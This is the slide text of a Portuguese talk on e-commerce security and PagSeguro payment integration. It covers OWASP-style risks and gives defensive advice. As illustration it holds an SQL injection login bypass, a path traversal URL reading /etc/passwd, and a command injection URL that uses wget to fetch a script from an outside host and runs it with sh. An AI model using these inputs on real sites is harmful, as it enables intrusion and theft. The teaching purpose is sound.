SlideShare uma empresa Scribd logo

E-commerce seguro com PagSeguro

Elcio Ferreira
Elcio Ferreira

O documento discute vários riscos de segurança para e-commerce, incluindo injeção SQL, quebra de fluxo, XSS e ataques de negação de serviço. Ele também fornece dicas sobre como implementar pagamentos seguros com PagSeguro, validando tokens e valores retornados e permanecendo vigilante contra fraudes.

Tecnologia
1 de 41
Baixar para ler offline
e­Commerce seguro com  PagSeguro
medo
OWASP owasp.org
Segurança em todo o processo
Sistema atualizado
Portas fechadas  
Senhas seguras
SSL
Falhas na aplicação
SQL Injection
<? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?>
<? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?> login: admin senha: ' OR '1'='1
<? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?> login: admin senha: ' OR '1'='1 SELECT * FROM user WHERE login='admin' AND senha='' OR '1'='1'
Falsificação de Identidade
Controles no Client
<input type="hidden" name="desconto" value="10,00" />
Quebra de Fluxo
http://seusite.com/compra.php?passo=1
Ataques contra outros clients
HTML Injection
Script Injection
XSS
XSRF
Exposição de recursos
http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php
http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php http://seusite.com/compra.php?passo=1 &stop=1&template=../../etc/passwd
Execução de recursos
http://seusite.com/relatorio.php? tipo=3&gerador=pdfmaker
http://seusite.com/relatorio.php? tipo=3&gerador=pdfmaker http://seusite.com/relatorio.php? tipo=3&gerador=wget+pirata.com/script http://seusite.com/relatorio.php? tipo=3&gerador=sh+script
Autenticação falha
Criptografia insegura
Falha de restrição de acesso
Denial Of Service
Pagamento: processo crítico
PagSeguro
PagSeguro: ­ Uma única implantação ­ Segurança contra  chargeback/fraude ­ EVSSL + Aplicação segura
Formas de implantação: ­ Carrinho PagSeguro ­ Carrinho Próprio ­ Retorno Automático
Pontos sensíveis: ­ HTML do Form de Carrinho ­ URL de Retorno
Proteja sua URL de Retorno: ­ Valide com o Token ­ Valide os Valores ­ Log ­ Fique alerta!
Obrigado! visie.com.br elcio@visie.com.br

Recomendados

Ecommerce, mais simples do que parece
Ecommerce, mais simples do que pareceEcommerce, mais simples do que parece
Ecommerce, mais simples do que pareceImpacta Eventos
 
IMRS 2010 | Daniela Melo | E-Commerce - PagSeguro
IMRS 2010 | Daniela Melo | E-Commerce - PagSeguroIMRS 2010 | Daniela Melo | E-Commerce - PagSeguro
IMRS 2010 | Daniela Melo | E-Commerce - PagSeguroIMRS - Internet Marketing Road Show
 
Pagseguro
PagseguroPagseguro
PagseguroAdilmar Dantas
 
Javascript levado a serio
Javascript levado a serioJavascript levado a serio
Javascript levado a serioJaydson Gomes
 
Palestra de segurança em PHP - Hacking
Palestra de segurança em PHP - HackingPalestra de segurança em PHP - Hacking
Palestra de segurança em PHP - HackingLuis Gustavo Almeida
 
Escrevendo códigos php seguros
Escrevendo códigos php segurosEscrevendo códigos php seguros
Escrevendo códigos php segurosDouglas V. Pasqua
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEMagno Logan
 
Segurança Web com PHP5
Segurança Web com PHP5Segurança Web com PHP5
Segurança Web com PHP5Douglas V. Pasqua
 

Recomendados

Ecommerce, mais simples do que parece
Ecommerce, mais simples do que pareceEcommerce, mais simples do que parece
Ecommerce, mais simples do que pareceImpacta Eventos
 
IMRS 2010 | Daniela Melo | E-Commerce - PagSeguro
IMRS 2010 | Daniela Melo | E-Commerce - PagSeguroIMRS 2010 | Daniela Melo | E-Commerce - PagSeguro
IMRS 2010 | Daniela Melo | E-Commerce - PagSeguroIMRS - Internet Marketing Road Show
 
Pagseguro
PagseguroPagseguro
PagseguroAdilmar Dantas
 
Javascript levado a serio
Javascript levado a serioJavascript levado a serio
Javascript levado a serioJaydson Gomes
 
Palestra de segurança em PHP - Hacking
Palestra de segurança em PHP - HackingPalestra de segurança em PHP - Hacking
Palestra de segurança em PHP - HackingLuis Gustavo Almeida
 
Escrevendo códigos php seguros
Escrevendo códigos php segurosEscrevendo códigos php seguros
Escrevendo códigos php segurosDouglas V. Pasqua
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEMagno Logan
 
Segurança Web com PHP5
Segurança Web com PHP5Segurança Web com PHP5
Segurança Web com PHP5Douglas V. Pasqua
 
Desenvolvimento seguro - WorkSec 2019
Desenvolvimento seguro - WorkSec 2019Desenvolvimento seguro - WorkSec 2019
Desenvolvimento seguro - WorkSec 2019Alcyon Ferreira de Souza Junior, MSc
 
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...iMasters
 
Hello SAFE World!!!
Hello SAFE World!!!Hello SAFE World!!!
Hello SAFE World!!!Everaldo Wanderlei Uavniczak
 
[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com CodeceptionJúlio de Lima
 
Desenvolvimento de Software Seguro
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software SeguroAugusto Lüdtke
 
Minicurso de Segurança em Java EE 7
Minicurso de Segurança em Java EE 7Minicurso de Segurança em Java EE 7
Minicurso de Segurança em Java EE 7Helder da Rocha
 
Quem tem medo do XSS
Quem tem medo do XSSQuem tem medo do XSS
Quem tem medo do XSSWilliam Costa
 
ZF Básico - 6. Autenticação
ZF Básico - 6. AutenticaçãoZF Básico - 6. Autenticação
ZF Básico - 6. AutenticaçãoMarcos Bezerra
 
Sql injection
Sql injectionSql injection
Sql injectionTiago Natel de Moura
 
Testes de segurança em aplicações web
Testes de segurança em aplicações webTestes de segurança em aplicações web
Testes de segurança em aplicações webSynergia - Engenharia de Software e Sistemas
 
Segurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSegurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSamyr Abdo
 
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
Play Framework - FLISOL
Play Framework - FLISOLPlay Framework - FLISOL
Play Framework - FLISOLgrupoweblovers
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilWilliam Costa
 
Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4William Costa
 
Segurança em aplicações web
Segurança em aplicações webSegurança em aplicações web
Segurança em aplicações webPaulo Moura
 
Autenticação e Controle de Acesso
Autenticação e Controle de AcessoAutenticação e Controle de Acesso
Autenticação e Controle de AcessoDenis L Presciliano
 
13 Java Script - Validação de formulário
13 Java Script - Validação de formulário13 Java Script - Validação de formulário
13 Java Script - Validação de formulárioCentro Paula Souza
 
Criando APIs usando o micro-framework Respect
Criando APIs usando o micro-framework RespectCriando APIs usando o micro-framework Respect
Criando APIs usando o micro-framework RespectIvan Rosolen
 
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerra
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerraAprendendo a atacar (e proteger) aplicações web através de jogos de guerra
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerraClavis Segurança da Informação
 
Yes we can!
Yes we can!Yes we can!
Yes we can!Elcio Ferreira
 
O efeito das redes sociais sobre você
O efeito das redes sociais sobre vocêO efeito das redes sociais sobre você
O efeito das redes sociais sobre vocêElcio Ferreira
 

Mais conteúdo relacionado

Semelhante a E-commerce seguro com PagSeguro

InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...iMasters
 
[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com CodeceptionJúlio de Lima
 
Desenvolvimento de Software Seguro
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software SeguroAugusto Lüdtke
 
Minicurso de Segurança em Java EE 7
Minicurso de Segurança em Java EE 7Minicurso de Segurança em Java EE 7
Minicurso de Segurança em Java EE 7Helder da Rocha
 
Quem tem medo do XSS
Quem tem medo do XSSQuem tem medo do XSS
Quem tem medo do XSSWilliam Costa
 
ZF Básico - 6. Autenticação
ZF Básico - 6. AutenticaçãoZF Básico - 6. Autenticação
ZF Básico - 6. AutenticaçãoMarcos Bezerra
 
Segurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSegurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSamyr Abdo
 
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
Play Framework - FLISOL
Play Framework - FLISOLPlay Framework - FLISOL
Play Framework - FLISOLgrupoweblovers
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilWilliam Costa
 
Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4William Costa
 
Segurança em aplicações web
Segurança em aplicações webSegurança em aplicações web
Segurança em aplicações webPaulo Moura
 
Autenticação e Controle de Acesso
Autenticação e Controle de AcessoAutenticação e Controle de Acesso
Autenticação e Controle de AcessoDenis L Presciliano
 
13 Java Script - Validação de formulário
13 Java Script - Validação de formulário13 Java Script - Validação de formulário
13 Java Script - Validação de formulárioCentro Paula Souza
 
Criando APIs usando o micro-framework Respect
Criando APIs usando o micro-framework RespectCriando APIs usando o micro-framework Respect
Criando APIs usando o micro-framework RespectIvan Rosolen
 
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerra
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerraAprendendo a atacar (e proteger) aplicações web através de jogos de guerra
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerraClavis Segurança da Informação
 

Semelhante a E-commerce seguro com PagSeguro (20)

Desenvolvimento seguro - WorkSec 2019
Desenvolvimento seguro - WorkSec 2019Desenvolvimento seguro - WorkSec 2019
Desenvolvimento seguro - WorkSec 2019
 
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
 
Hello SAFE World!!!
Hello SAFE World!!!Hello SAFE World!!!
Hello SAFE World!!!
 
[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception
 
Desenvolvimento de Software Seguro
Desenvolvimento de Software SeguroDesenvolvimento de Software Seguro
Desenvolvimento de Software Seguro
 
Minicurso de Segurança em Java EE 7
Minicurso de Segurança em Java EE 7Minicurso de Segurança em Java EE 7
Minicurso de Segurança em Java EE 7
 
Quem tem medo do XSS
Quem tem medo do XSSQuem tem medo do XSS
Quem tem medo do XSS
 
ZF Básico - 6. Autenticação
ZF Básico - 6. AutenticaçãoZF Básico - 6. Autenticação
ZF Básico - 6. Autenticação
 
Sql injection
Sql injectionSql injection
Sql injection
 
Testes de segurança em aplicações web
Testes de segurança em aplicações webTestes de segurança em aplicações web
Testes de segurança em aplicações web
 
Segurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSegurança PHP - por Samyr Abdo
Segurança PHP - por Samyr Abdo
 
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 02 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
 
Play Framework - FLISOL
Play Framework - FLISOLPlay Framework - FLISOL
Play Framework - FLISOL
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasil
 
Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4Xss injection indo alem do alert.v 0.4
Xss injection indo alem do alert.v 0.4
 
Segurança em aplicações web
Segurança em aplicações webSegurança em aplicações web
Segurança em aplicações web
 
Autenticação e Controle de Acesso
Autenticação e Controle de AcessoAutenticação e Controle de Acesso
Autenticação e Controle de Acesso
 
13 Java Script - Validação de formulário
13 Java Script - Validação de formulário13 Java Script - Validação de formulário
13 Java Script - Validação de formulário
 
Criando APIs usando o micro-framework Respect
Criando APIs usando o micro-framework RespectCriando APIs usando o micro-framework Respect
Criando APIs usando o micro-framework Respect
 
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerra
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerraAprendendo a atacar (e proteger) aplicações web através de jogos de guerra
Aprendendo a atacar (e proteger) aplicações web através de jogos de guerra
 

Mais de Elcio Ferreira

O efeito das redes sociais sobre você
O efeito das redes sociais sobre vocêO efeito das redes sociais sobre você
O efeito das redes sociais sobre vocêElcio Ferreira
 
Produtos e serviços da Web 2.0
Produtos e serviços da Web 2.0Produtos e serviços da Web 2.0
Produtos e serviços da Web 2.0Elcio Ferreira
 
Microformats, a web semântica com letra minúscula
Microformats, a web semântica com letra minúsculaMicroformats, a web semântica com letra minúscula
Microformats, a web semântica com letra minúsculaElcio Ferreira
 

Mais de Elcio Ferreira (8)

Yes we can!
Yes we can!Yes we can!
Yes we can!
 
O efeito das redes sociais sobre você
O efeito das redes sociais sobre vocêO efeito das redes sociais sobre você
O efeito das redes sociais sobre você
 
HTML5 - Um Ano Depois
HTML5 - Um Ano DepoisHTML5 - Um Ano Depois
HTML5 - Um Ano Depois
 
Html5
Html5Html5
Html5
 
Produtos e serviços da Web 2.0
Produtos e serviços da Web 2.0Produtos e serviços da Web 2.0
Produtos e serviços da Web 2.0
 
Código
CódigoCódigo
Código
 
Produtividade
ProdutividadeProdutividade
Produtividade
 
Microformats, a web semântica com letra minúscula
Microformats, a web semântica com letra minúsculaMicroformats, a web semântica com letra minúscula
Microformats, a web semântica com letra minúscula
 

E-commerce seguro com PagSeguro